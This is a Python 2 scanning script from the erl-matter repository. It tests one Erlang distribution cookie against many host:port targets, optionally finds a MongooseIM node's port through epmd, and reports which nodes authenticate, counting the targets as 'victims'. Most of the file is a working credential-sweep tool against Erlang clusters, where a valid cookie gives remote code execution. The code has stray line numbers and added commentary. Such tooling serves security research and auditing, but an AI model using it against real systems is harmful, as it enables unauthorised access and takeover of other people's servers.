GitHub Repository: gteissier/erl-matter
Path: blob/master/sweep-default-cookie.py
#!/usr/bin/env python2
from struct import pack, unpack
from socket import socket, AF_INET, SOCK_STREAM, SHUT_RDWR, timeout, error
from hashlib import md5
from random import choice, shuffle
from string import ascii_uppercase
import sys
import argparse
from time import sleep
import re
def rand_id(n=6):
    """Return a throwaway node name: *n* random uppercase ASCII letters
    followed by the fixed host part '@mars'."""
    letters = [choice(ascii_uppercase) for _ in range(n)]
    return ''.join(letters) + '@mars'
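# Command line: one cookie value, a file of host:port targets, an optional
# port refresh through the name daemon on 4369, and an unused delay.
# The help strings were wrong before: the script tests ONE cookie against
# MANY targets (not a dictionary against one host), the --refresh-with-epmd
# flag ENABLES the epmd lookup (see the main loop), and 'targets' is a file
# path, not an inline list.
parser = argparse.ArgumentParser(description='Tests one cookie value against every host:port listed in the targets file and reports which nodes complete authentication with it.')

parser.add_argument('--refresh-with-epmd', action='store_true', help='Look each port up via epmd (port 4369) instead of using the port from the targets file', default=False)
parser.add_argument('cookie', action='store', type=str, help='Cookie value to test against every target')
parser.add_argument('targets', action='store', type=str, help='Path to a file with one host:port per line')
# NOTE: --delay is parsed but never read by this script; sleep() is imported
# at the top of the file and never called.
parser.add_argument('--delay', type=float, default=0.0, help='Amount of seconds (float) to sleep between attempts')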
def send_name(name):
    """Build the handshake 'send_name' message carrying *name*.

    Layout per the '!HcHI' format (big-endian): a 2-byte length, the tag
    byte 'n', the 2-byte version 5, a 4-byte flags word 0x7499c, then the
    raw node name.  The length is 7 + len(name) because tag, version and
    flags together occupy 1 + 2 + 4 = 7 bytes after the length field.

    Relies on Python 2 str semantics: both the packed header and *name*
    are byte strings joined with '+'.
    """
    return pack('!HcHI', 7 + len(name), 'n', 5, 0x7499c) + name
def send_challenge_reply(cookie, challenge):
    """Build the handshake 'send_challenge_reply' message.

    The response is MD5(cookie || challenge); the caller passes the peer's
    challenge as its decimal string form.  Framing per '!HcI': a 2-byte
    length of 5 + len(digest), the tag byte 'r', a 4-byte field that this
    implementation always sets to 0, followed by the 16-byte digest.
    """
    m = md5()
    m.update(cookie)
    m.update(challenge)
    response = m.digest()
    # 5 = tag (1) + the 4-byte field; the digest itself is not counted twice.
    return pack('!HcI', len(response)+5, 'r', 0) + response
def refresh_erldp_port(host):
    """Ask the daemon on *host*:4369 for its registered names and return the
    port of the node named 'mongooseim', or None when it is not listed.

    The flag that enables this path calls the daemon "epmd".  The request is
    the 2-byte length 1 followed by the byte 'n' (0x6e); the reply is read
    with a single recv(4096) and scanned for 'name <name> at port <port>'.

    Raises socket.error / socket.timeout from connect/sendall/recv.  On those
    paths the socket is NOT closed (no try/finally).  A reply longer than
    4096 bytes, or one delivered in several segments, may be scanned only
    partially and the node then reported as absent.
    """
    sock = socket(AF_INET, SOCK_STREAM)

    sock.settimeout(20.0)

    sock.connect((host, 4369))

    sock.sendall('\x00\x01\x6e')
    data = sock.recv(4096)
    sock.close()

    for m in re.finditer(r'name (.*?) at port (\d+)', data):
        # NOTE: rebinds the *host* parameter with the node name; harmless
        # here because *host* is not used after the loop.
        host = m.group(1)
        port = int(m.group(2))
        if host == 'mongooseim': return port
def does_cookie_authenticate(host, port):
    """Run one distribution handshake against host:port using args.cookie.

    Returns True when the peer answers the challenge reply with a 17-byte
    'a' message (tag plus 16-byte digest); returns False when the peer
    closes the connection instead (recv returns an empty string).

    Reads the module-level *args*, which is assigned further down the file
    before the first call.  Protocol expectations are checked with bare
    assert statements: they are stripped under ``python -O``, and when they
    fail they raise AssertionError without closing the socket.  socket.error
    and socket.timeout propagate to the caller, also leaving the socket open.
    """
    name = rand_id(6)

    sock = socket(AF_INET, SOCK_STREAM, 0)
    # socket() raises on failure, so this assert never fires.
    assert(sock)

    sock.settimeout(20.0)

    sock.connect((host, port))

    sock.sendall(send_name(name))

    # Expect the 5-byte 'sok' reply: length 3, then bytes 's','o','k'.
    data = sock.recv(5)
    assert(data == '\x00\x03\x73\x6f\x6b')

    # Challenge message; only the first 13 bytes are unpacked (length, tag,
    # version, flags, 32-bit challenge) and the tag is not checked.  A short
    # recv would make unpack() raise struct.error here.
    data = sock.recv(4096)

    (length, tag, version, flags, challenge) = unpack('!HcHII', data[:13])
    # The challenge is hashed in its decimal string representation.
    challenge = '%u' % challenge

    sock.sendall(send_challenge_reply(args.cookie, challenge))

    # 0x11 = 17 = tag 'a' (0x61) + a 16-byte digest.
    data = sock.recv(3)
    if len(data) == 0:
        sock.close()
        return False
    else:
        assert(data == '\x00\x11\x61')
        # The peer's digest is read but never verified against the cookie.
        digest = sock.recv(16)
        assert(len(digest) == 16)
        sock.close()

    return True
args = parser.parse_args()
89
90
91
92
f = open(args.targets, 'rb')
93
targets = [l.rstrip('\n') for l in f.readlines()]
94
shuffle(targets)
95
n_targets = len(targets)
96
97
n_no_epmd = 0
98
n_not_accessible = 0
99
n_not_challenging = 0
100
n_valid_cookie = 0
101
n_wrong_cookie = 0
def prRed(skk):
    """Print *skk* on its own line, wrapped in the ANSI red (91) colour code and a reset."""
    coloured = "\033[91m {}\033[00m".format(skk)
    print(coloured)
def prGreen(skk):
    """Print *skk* on its own line, wrapped in the ANSI green (92) colour code and a reset."""
    coloured = "\033[92m {}\033[00m".format(skk)
    print(coloured)
def prYellow(skk):
    """Print *skk* on its own line, wrapped in the ANSI yellow (93) colour code and a reset."""
    coloured = "\033[93m {}\033[00m".format(skk)
    print(coloured)
# Main loop: one handshake attempt per target, in the shuffled order.
# NOTE: args.delay is never consulted here and sleep() is never called, so
# attempts run back to back regardless of --delay.
for i in range(n_targets):
    # Raises ValueError unless the line holds exactly one ':'.
    (host, port) = targets[i].split(':')
    port = int(port)

    # Optional port lookup through the daemon on 4369.  A missing node
    # (None) is folded into the same 'no epmd' outcome as a connection error.
    if args.refresh_with_epmd:
        try:
            port = refresh_erldp_port(host)
            if port is None: raise error()
        except error:
            n_no_epmd += 1
            prRed('%s\t\t\tno epmd' % (host))
            continue
    else:
        pass

    # NOTE: socket.timeout is a subclass of socket.error, so the first
    # except clause also catches timeouts; the 'except timeout' branch
    # below is unreachable and n_not_challenging always stays 0.
    try:
        if does_cookie_authenticate(host, port):
            n_valid_cookie += 1
            prGreen('%s:%d\t\tvalid' % (host, port))
        else:
            n_wrong_cookie += 1
            prYellow('%s:%d\t\tinvalid' % (host, port))
    except error:
        n_not_accessible += 1
        prRed('%s:%d\t\tnot accessible' % (host, port))
    except timeout:
        n_not_challenging += 1
        prRed('%s:%d\t\tnot challenging ' % (host, port))


# Summary of the counters; AssertionError from the handshake checks is not
# caught above and would abort the run before this line.
print('total victims %d valid %d no epmd %d invalid %d not accessible %d not challenging %d' % (n_targets, n_valid_cookie, n_no_epmd, n_wrong_cookie, n_not_accessible, n_not_challenging))